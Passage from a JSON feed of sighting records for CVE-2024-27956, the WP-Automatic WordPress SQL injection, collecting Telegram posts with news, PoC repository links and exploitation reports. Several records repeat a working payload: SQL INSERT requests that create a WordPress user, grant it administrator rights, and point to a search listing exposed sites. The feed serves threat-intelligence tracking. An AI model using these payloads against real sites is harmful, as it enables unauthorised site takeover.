\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430\u0445 \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u043a\u0430\u0437\u043e\u0432. \u0422\u0430\u043a\u0436\u0435 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u044e\u0442\u0441\u044f \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 \u0441 \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0442\u0440\u0430\u0444\u0438\u043a\u0430 \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0435 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b.\n\n\u0425\u043e\u0442\u044f \u0442\u043e\u0447\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0441\u0430\u0439\u0442\u043e\u0432 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438, \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0430\u0445 \u0438 \u0442\u0435\u043c\u0430\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u0447\u0435\u0440\u0435\u0437 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u043c\u0443 \u043e\u0442\u0447\u0451\u0442\u0443 Patchstack, \u0442\u043e\u043b\u044c\u043a\u043e \u0441 \u043d\u0430\u0447\u0430\u043b\u0430 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u043e \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u0447\u0435\u0442\u044b\u0440\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0430\u0445 WordPress, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438. \u0421\u0440\u0435\u0434\u0438 \u043d\u0438\u0445 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 WordPress Automatic Plugin ( CVE-2024-27956 ) \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0442\u0435\u043c\u0430\u0445 Bricks \u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430\u0445 GiveWP \u0438 Startklar Elementor Addons, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u0414\u043b\u044f \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u0440\u0438\u0441\u043a\u043e\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u043f\u043b\u0430\u0433\u0438\u043d\u044b \u0438 \u0442\u0435\u043c\u044b, \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0441\u0430\u0439\u0442\u0430 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441\u043b\u043e\u0436\u043d\u044b\u0435 \u043f\u0430\u0440\u043e\u043b\u0438 \u0438 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u044d\u043a\u0440\u0430\u043d\u044b \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439. \u042d\u0442\u0438 \u043c\u0435\u0440\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043e\u0442\u0441\u0435\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-04-01T12:30:18.000000Z"}, {"uuid": "63632850-38f2-4c18-bb95-fe861417f613", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/51t8UUBcVa-x2wjoRIM2mT2i7yna57J_B3bG-USYfuPX_VI", "content": "", "creation_timestamp": "2025-07-13T02:12:01.000000Z"}, {"uuid": "15571bdd-3fc6-4d1b-b41b-2b36f502de69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "Telegram/0OMxSfo6PWHdjqJAd6WogyTJvQRKY_lhNy48UYmllxPrrA", "content": "", "creation_timestamp": "2025-04-05T11:26:50.000000Z"}, {"uuid": "4c3039a5-03c0-40ac-8512-0f8775c04721", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/x-xWRWZlWT-07eDEe3iV-8r6WnFr_WokjLoD1BeJ7u0", "content": "", "creation_timestamp": "2024-07-31T13:06:34.000000Z"}, {"uuid": "7d91dce7-d13e-4fe5-bcc9-eea515206dd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://t.me/jokeir7x0/1799", "content": "Find And  RCE in wordpress - CVE-2024-27956", "creation_timestamp": "2025-01-03T21:14:28.000000Z"}, {"uuid": "cd7b5c1e-978c-4d5c-84fb-ba58bab657dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "Telegram/yzGbBxsOghOAqAuLNaR3rwZ7KI9_q4zrVkF6w3KXkP-NzaE", "content": "", "creation_timestamp": "2024-04-26T09:20:55.000000Z"}, {"uuid": "6ba2d409-6850-48cd-8e12-1a5b3130afb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "Telegram/BL9yvmtbKyYdg807Kyf61hIBzp9Xje0izG-Qb0NJJR5MYA", "content": "", "creation_timestamp": "2024-04-26T11:41:46.000000Z"}, {"uuid": "1e424c02-25c2-4a51-aa7f-84772a23acb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/Us_jsiVPd1Zr21cadDGbiDzpTShSlwaE-05NMwjgJC7HBw", "content": "", "creation_timestamp": "2024-04-29T06:25:44.000000Z"}, {"uuid": "cb4d256d-f27a-4d26-acf8-20ec33f8eada", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/Teamx1945x/5133", "content": "\u064a\u0648\u0627\u062c\u0647 \u0645\u0627\u0644\u0643\u0648 \u0645\u0648\u0627\u0642\u0639 WordPress \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u0623\u0645\u0646\u064a\u064b\u0627 \u062e\u0637\u064a\u0631\u064b\u0627 \u0628\u0633\u0628\u0628 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062e\u0637\u064a\u0631\u0629 (CVE-2024-27956) \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0641\u064a \u0627\u0644\u0645\u0643\u0648\u0646 \u0627\u0644\u0625\u0636\u0627\u0641\u064a WP Automatic \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639. \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062c\u0647\u0627\u062a \u0627\u0644\u0641\u0627\u0639\u0644\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0647\u0630\u0627 \u0627\u0644\u062e\u0644\u0644 \u0628\u0634\u0643\u0644 \u0646\u0634\u0637 \u0644\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0645\u0648\u0627\u0642\u0639 \u0627\u0644\u0648\u064a\u0628 \u0627\u0644\u0645\u0639\u0631\u0636\u0629 \u0644\u0644\u062e\u0637\u0631. \u062a\u0648\u0641\u0631 \u0647\u0630\u0647 \u0627\u0644\u0645\u0642\u0627\u0644\u0629 \u0634\u0631\u062d\u064b\u0627 \u0634\u0627\u0645\u0644\u0627\u064b \u0644\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u062a\u0623\u062b\u064a\u0631\u0647\u0627 \u0648\u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062d\u0627\u0633\u0645\u0629 \u0627\u0644\u062a\u064a \u064a\u062c\u0628 \u0639\u0644\u0649 \u0645\u0633\u0624\u0648\u0644\u064a \u0645\u0648\u0627\u0642\u0639 \u0627\u0644\u0648\u064a\u0628 \u0627\u062a\u062e\u0627\u0630\u0647\u0627 \u0644\u062d\u0645\u0627\u064a\u0629 \u0645\u0648\u0627\u0642\u0639\u0647\u0645.\n\n\u0631\u0642\u0645 CVE-2024-27956\n\n\u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0641\u0648\u0631\u064a: \u0627\u0644\u062e\u0637\u0648\u0629 \u0627\u0644\u0623\u0643\u062b\u0631 \u0623\u0647\u0645\u064a\u0629 \u0647\u064a \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0645\u0643\u0648\u0646 \u0627\u0644\u0625\u0636\u0627\u0641\u064a WP Automatic \u0625\u0644\u0649 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 3.9.2.1 (\u0623\u0648 \u0627\u0644\u0623\u062d\u062f\u062b) \u0641\u064a \u0623\u0642\u0631\u0628 \u0648\u0642\u062a \u0645\u0645\u0643\u0646. \u064a\u0639\u0627\u0644\u062c \u0647\u0630\u0627 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0645\u0635\u062d\u062d \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u064a\u0642\u0644\u0644 \u0628\u0634\u0643\u0644 \u0643\u0628\u064a\u0631 \u0645\u0646 \u062a\u0639\u0631\u0636 \u0645\u0648\u0642\u0639 \u0627\u0644\u0648\u064a\u0628 \u0627\u0644\u062e\u0627\u0635 \u0628\u0643.", "creation_timestamp": "2024-04-26T22:31:25.000000Z"}, {"uuid": "722b9a70-1817-483d-9b69-150c743cf84a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/291", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8WordPress Auto Admin Account Creation & Reverse Shell CVE-2024-27956 automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. \n\nhttps://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956\n\n#DarkWeb #Cybersecurity #Security #Cyberattack #Cybercrime #Privacy #Infosec #Exploit #CVE202427956 \n\nhttps://x.com/DarkWebInformer/status/1791474570509070439", "creation_timestamp": "2024-05-17T16:28:22.000000Z"}, {"uuid": "48a6d701-a87a-4817-8faa-b5b4163f8e60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/262", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8PoC for WordPress Auto Admin Account Creation and Reverse Shell CVE-2024-27956. GitHub in X Link.\n\n#DarkWeb #Cybersecurity #Security #Cyberattack #Cybercrime #Privacy #Infosec #Exploit #Wordpress #CVE202427956\n\nDetails:\n\nThis Python script automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries on the WordPress database and gain administrative access.\n\nX Link: https://twitter.com/DarkWebInformer/status/1790400822511280334", "creation_timestamp": "2024-05-14T17:21:50.000000Z"}, {"uuid": "7b89d86a-532c-491d-981a-190091b7e732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/CivilityBreaches/65", "content": "cve-2024-27956\n*\nWordPress Auto Admin Account Creation and Reverse Shell.\n*\n\u0414\u044b\u0440\u043a\u0430 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 wp-automatic \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n#wordpress", "creation_timestamp": "2024-05-17T14:12:08.000000Z"}, {"uuid": "9216d01a-94b3-49c0-a554-dc2b85df2f2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/200", "content": "cve-2024-27956\n\n\nWordPress Auto Admin Account Creation and Reverse Shell.\n\n\n\u0414\u044b\u0440\u043a\u0430 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 wp-automatic \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.", "creation_timestamp": "2024-05-15T02:09:31.000000Z"}, {"uuid": "0e42c79a-eda6-4f72-bd60-a06adb5c2750", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/DARK_SPOT_TEAM/236", "content": "\ud83d\udc69\u200d\ud83d\udcbb PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)\n\nSince \"q\" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. \n\nAdding a new WordPress user:\nq=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28\n\nGiving the user admin rights:\nq=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c\n\nPWNED!\n\nNote: Param \"integ\" is the md5sum of the query.\n\n6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22\n\nTweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12", "creation_timestamp": "2024-05-07T13:46:26.000000Z"}, {"uuid": "20c7d97b-e1c3-490e-bcd6-aff890d1256b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/qnNP2u5GNU2VjSvWEkHSV60yRxN8A0gKZ9jltvu_fzrv", "content": "", "creation_timestamp": "2024-05-07T13:46:26.000000Z"}, {"uuid": "e1f77aff-8ad9-4832-86bc-2b5e0543358c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/6335", "content": "The Hacker News\nHackers Exploiting WP-Automatic Plugin Bug to Create Admin Accounts on WordPress Sites\n\nThreat actors are attempting to actively exploit a critical security flaw in the WP\u2011Automatic plugin for WordPress that could allow site takeovers.\nThe shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin prior to 3.9.2.0.\n\"This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as", "creation_timestamp": "2024-04-26T11:41:47.000000Z"}, {"uuid": "1776ffa5-9c66-4765-a13a-b9fcf4866e13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/blackcybersec/85", "content": "https://github.com/ThatNotEasy/CVE-2024-27956", "creation_timestamp": "2024-07-11T16:21:10.000000Z"}, {"uuid": "398cb0ba-6497-4d48-9435-e423637d8a24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/3497", "content": "https://github.com/ThatNotEasy/CVE-2024-27956", "creation_timestamp": "2024-07-11T18:57:32.000000Z"}, {"uuid": "2aa4e3e0-bfb2-490f-aa1d-b6099fd5a407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/2939", "content": "\ud83d\udc69\u200d\ud83d\udcbb PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)\n\nSince \"q\" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. \n\nAdding a new WordPress user:\nq=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28\nGiving the user admin rights:\nq=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c\nPWNED!\n\nNote: Param \"integ\" is the md5sum of the query.\n\n6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22\n\nTweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12", "creation_timestamp": "2024-06-13T06:56:04.000000Z"}, {"uuid": "f7a83088-b6e2-4753-953b-e89bfedf8432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/hitshare/1417", "content": "cve-2024-27956\n*\nWordPress Auto Admin Account Creation and Reverse Shell.\n*\n\u0414\u044b\u0440\u043a\u0430 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 wp-automatic \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n#wordpress", "creation_timestamp": "2024-05-15T05:13:12.000000Z"}, {"uuid": "e4b3e2ce-8d62-4799-9919-14edf5d3b81c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/830", "content": "\ud83d\udc69\u200d\ud83d\udcbb PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)\n\nSince \"q\" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. \n\nAdding a new WordPress user:\nq=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28\nGiving the user admin rights:\nq=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c\nPWNED!\n\nNote: Param \"integ\" is the md5sum of the query.\n\n6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22\n\nTweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12", "creation_timestamp": "2025-01-04T15:36:18.000000Z"}, {"uuid": "e408519f-8bc6-43b4-8a62-134de0424139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://t.me/arpsyndicate/4928", "content": "#ExploitObserverAlert\n\nCVE-2024-27956\n\nDESCRIPTION: Exploit Observer has 21 entries in 7 file formats related to CVE-2024-27956. Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.\n\nFIRST-EPSS: 0.000500000\nARPS-PRIORITY: 0.95083", "creation_timestamp": "2024-05-05T19:29:34.000000Z"}, {"uuid": "a6a3ee76-1d96-4c1e-a33e-febb08589c41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://t.me/arpsyndicate/4904", "content": "#ExploitObserverAlert\n\nCVE-2024-27956\n\nDESCRIPTION: Exploit Observer has 12 entries in 6 file formats related to CVE-2024-27956. Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.\n\nFIRST-EPSS: 0.000500000\nARPS-PRIORITY: 0.9620892", "creation_timestamp": "2024-05-02T21:36:54.000000Z"}, {"uuid": "c04c37e5-b479-4072-8bc2-0b9a20971055", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "Telegram/FN2CyBRBwYalXt_sXgKXgEXPTfes7zHyCSxu1jqjRdMNgg", "content": "", "creation_timestamp": "2024-04-26T10:02:25.000000Z"}, {"uuid": "96d77e5f-ebf5-4df2-bab1-23c84b208092", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/503", "content": "https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", "creation_timestamp": "2024-05-15T08:13:30.000000Z"}, {"uuid": "24012256-64ec-447f-bfe6-ae45b781ba18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/396", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T02:46:52.000000Z"}, {"uuid": "650cb4f8-77fe-4a30-98f6-5cbc786381e3", "vulnerability_lookup_origin": 